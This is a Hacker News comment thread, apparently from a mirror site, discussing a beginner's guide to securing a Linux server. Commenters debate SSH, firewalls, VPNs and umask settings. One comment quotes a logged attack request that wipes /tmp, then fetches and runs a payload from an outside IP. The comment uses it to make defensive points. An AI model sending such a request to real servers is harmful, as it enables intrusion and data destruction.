The Reluctant Sysadmin's Guide to Securing a Linux Server

331 点作者 WallyFunk将近 2 年前

31 条评论

gazby将近 2 年前

There's a reason guides like this are a dime a dozen - there is no way to generalize server configuration this broadly.But as long as we're doing it anyway - the only thing that locking the root account gets you is assurance that if you ever bork the user you created in this guide (or sudo functionality as a whole) you'll have no way to recover without booting into another environment.Perhaps one ought not take sysadmin advice from a blog post with a first sentence that reads "I’m not a sysadmin, and I don’t want to be".

评论 #36935239 未加载

评论 #36936212 未加载

评论 #36939196 未加载

评论 #36942502 未加载

评论 #36936106 未加载

评论 #36936560 未加载

评论 #36936583 未加载

teddyh将近 2 年前

I would instead suggest the official guide; the Securing Debian Manual <<a href="https://www.debian.org/doc/manuals/securing-debian-manual/" rel="nofollow noreferrer">https://www.debian.org/doc/manuals/securing-debian-manual/</a>>

评论 #36940703 未加载

评论 #36936128 未加载

jeffbee将近 2 年前

It's weird to begin such an exercise without stating what the point of "the server" is supposed to be. Is it a ... web server? Interactive unix logins for developers? Mail relay? What does it do? This is the key point of the analysis because "securing" a server consists in making it incapable of doing anything not in the set of things it is meant to do. Notably, starting from this side of the problem can lead you away from "standard machine image". Starting with a kitchen-sink Linux distro like Ubuntu is not the road to hardness.

评论 #36934787 未加载

评论 #36934594 未加载

评论 #36934624 未加载

评论 #36934612 未加载

ufmace将近 2 年前

I actually disagree with most of this. I think that, for servers, it's best to stay as close to the "cattle, not pets" model as reasonably possible. Servers should be set up and maintained with automated tooling and rarely connected to manually, preferably only to debug issues. Most of the things in here are gimmicky one-offs that don't meaningfully increase security.Don't bother setting up a user account, use a public key authorized SSH session as root to do everything. Setting up UFW to block everything but what you should be serving is good. I don't see much point in things like Wireguard or this umask thing.

评论 #36939349 未加载

politelemon将近 2 年前

> If you’re on Windows, PuTTYgen should workIf you're on Windows you can `wsl --install` and work with Linux (eg Ubuntu 2204).You can also install Git Bash which comes with ssh and ssh-keygen.Either way , same instructions.

评论 #36935003 未加载

gus_将近 2 年前

> GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.231/jaws;sh+/tmp/jawsin the case of a successful attack, some questions to ask could be:- why did they manage to use wget?- why {apache,nginx,postfix,exim,sendmail,...} is allowed to use wget, or curl, or nc or bash (or ...)?- why is wget, curl, nc, telnet, .. installed on the server? can they be uninstalled? with (!!) if it's a container.- why did they manage to execute files from /tmp, or /var/tmp, or /dev/shm? do these directories need write access for "others" or can they be mounted with "noexec"?- ufw/iptables/nftables won't stop local binaries from opening outbound connections, how would you stop outbound connections by binary, path, etc?- if they managed to wipe the logs, how could you have known all the commands they executed? could auditd+grafana (just an example) have helped here by sending logs to a remote server?

评论 #36941624 未加载

teekert将近 2 年前

I’m a biologist and also a reluctant sysadmin. I’m happy to see I do roughly the same [0] except that I use an ed25519 ssh key and switched to Tailscale (it’s just too easy). I only open “unsafe” ports on the tailnet.I did just install my first NixOS system so I’m indeed heading towards full automation.[0] <a href="https://blog.hmrt.nl/posts/first_steps_arch_box/" rel="nofollow noreferrer">https://blog.hmrt.nl/posts/first_steps_arch_box/</a>

评论 #36937661 未加载

评论 #36951585 未加载

JohnCClarke将近 2 年前

The first rule of sysadmin: Have a regular schedule for testing your offsite backups of all your systems.After that, as others have noted, create and review a threat model and use that to guide your hardening based on official guides:<a href="https://www.debian.org/doc/manuals/securing-debian-manual/" rel="nofollow noreferrer">https://www.debian.org/doc/manuals/securing-debian-manual/</a>and here's a readable introduction to the NIST STIGs:<a href="https://cybergladius.com/nist-server-hardening-best-practices/" rel="nofollow noreferrer">https://cybergladius.com/nist-server-hardening-best-practice...</a>

thr0waway001将近 2 年前

Reluctant sysadmin: story of my life.Over the last 3 years I have gone from being a timid junior web dev to reluctantly and hastily having to be the guy managing the Linux web servers and keeping the operation running and being hardened along the way.On the one hand, the huge salary increase has been nice but on the other hand I am constantly thinking one day I'm gonna fuck it all up. I feel like I'm not doing this job any justice and that I'm way out of my element all the time.I try to get better by reading blog posts like this and documentation and asking for advice but I just feel like an impostor all the time.But employers are happy with the results and I guess that makes it tolerable.So thanks for these types of guides!

pid-1将近 2 年前

Sysadmin isn't a profession you choose, it's something that happens to your life.

评论 #36940445 未加载

msravi将近 2 年前

Also configure fail2ban and enable it for ssh.<a href="https://www.digitalocean.com/community/tutorials/how-to-protect-ssh-with-fail2ban-on-ubuntu-20-04" rel="nofollow noreferrer">https://www.digitalocean.com/community/tutorials/how-to-prot...</a>

tristor将近 2 年前

I have a few things I disagree with in here and I haven't even gotten all the way through. Generally, most of this is unnecessary, some of it is even ill-advised. The best thing you can do is enable automated updates, and rely on your cloud provider's console for accessing the server and disabling all remote access otherwise. If you do this, you remove a significant amount of vectors of attack. Within AWS there are very good security controls you can put into place, on more generic VPS providers, at minimum you should start by running a firewall that only allows incoming and outgoing traffic on specified ports, and logging in only via key-based auth + 2FA (you can use Google Auth, Yubikey, or others to do this via PAM modules) if you must use SSH. Most of the security issues I've encountered in my career have been in the application, and then are used to provide a pathway to do further privilege escalation. If you work to sandbox your applications, such as using hardened minimal containers w/ appropriate namespacing & sVirt, this mitigates most concerns here.It's been trivially easy to prevent bots spamming basic SSH and HTTP attacks to every IPv4 address for a very long time.

评论 #36945999 未加载

DyslexicAtheist将近 2 年前

securing from what? this thing is pointless mid-90ies advise without a threat-model.

评论 #36936328 未加载

Sparkyte将近 2 年前

Meh, just do it like me get hardened image and container. Deploy stuff as a gold image without elevated permissions and or container. Then just make sure everything is behind a proxy or intelligent load balancer that restricts any crazy input.DONT OVERCOMPLICATE WORKOvercomplicating work means slower response times to solving problems.

评论 #37063302 未加载

Terretta将近 2 年前

If you are training an HN parody LLM, this is a perfect discussion to add to your training set, featuring all the canonical archetypes—including my comment among them.The headline and post read like top shelf parody too, as if synthetically generated to summon we archetypes.

mmsc将近 2 年前

I like the changing of the default umask, although it probably shouldn't be 077.Is acl needed over, say, chown?

评论 #36934979 未加载

评论 #36934744 未加载

评论 #36934740 未加载

tphummel将近 2 年前

This was an informative article with an opinionated take. Don’t update the original based on feedback. It is your article on your blog. You do you.

user3939382将近 2 年前

I’d learn to run OpenSCAP with CIS and the NIST CSF to get an idea of secure operations. The former can detect and remediate a lot of the issues these types of guides are discussing.But really the idea of being successful at anything while also having no knowledge of it is kind of a farcical contradiction.It’s like saying, look, I just want to build a rocket engine. Tell me how without all the physics mumbo jumbo.

lofaszvanitt将近 2 年前

Everyone is parroting the same thing over and over again, but no one is going into the whys. Why do this, what's the benefit, how will it thwart this or that type of attack. New books on the subject tend to collect these guides, distill them a bit, and parrot it all over again.

acumenical将近 2 年前

This notion of security is stale. Real security is far more complex than this, requiring automated provisioning and logging. This is more suitable for a VPS or a personal VM than anything professional. Also installing acl just to use setfacl bothered me.

r3n将近 2 年前

Is there a guide to teach these reluctant sysadmins how to evaluate, plan, and choose between all these different methods ?For me, I find the hardest part of securing systems are usually to decide what is good enough for the current situation.

lazyant将近 2 年前

> We want a umask of 077,No we don't. This creates problems with many packages. There's a reason for defaults and a reason not to follow cargo-culting security "recipes".

kbar13将近 2 年前

trying my best to understand the target audience for this blog post. It feels like most of these things fall somewhere in between "a sysadmin should know this" and "this might be new to a dev without much ops experience". And then, my first thought is, well if you're focused on getting software out the door your best bet is not to touch any of this stuff and deploy on a platform where configuring the Linux distro is not your responsibility. i.e. k8s or AWS ECS

nunez将近 2 年前

WireGuard is fine, but since it's only UDP, it doesn't work well if you're connecting behind a restrictive firewall or from a network using CGNAT (many of them).If you're a reluctant sysadmin that doesn't care, I'd recommend using Tailscale. It's wireguard without the drama, is extremely competent at piercing through almost any firewall [0], and has a great ACL system that lets you fine tune which accounts can access what.It's also free (for now)![0] <a href="https://tailscale.com/blog/how-nat-traversal-works/" rel="nofollow noreferrer">https://tailscale.com/blog/how-nat-traversal-works/</a>

bawolff将近 2 年前

I don't get why a wireguard vpn to connect to ssh would be any better than just ssh directly (assuming reasonable ssh config)

评论 #36941793 未加载

_el将近 2 年前

It's definitely neat to know how these things work on a Linux server, but most of this advice doesn't make sense for an EC2 instance. You should be using security groups instead of UFW (indeed the article mentions this). You don't need to configure SSH access because SSM session manager exists, which also makes the WireGuard setup superfluous, too.

jesprenj将近 2 年前

> You should not log in directly as root.Why not?

评论 #36938332 未加载

optimalsolver将近 2 年前

No Fail2ban?

评论 #36941996 未加载

badrabbit将近 2 年前

Run lynis and linpeas!!!Also, setup auditd and rsyslog forwarding. Backup anything important.

andai将近 2 年前

Wouldn't it be easier to use OpenBSD?

评论 #36939064 未加载

评论 #36935850 未加载

g4zj将近 2 年前

No mention of SSH certificates?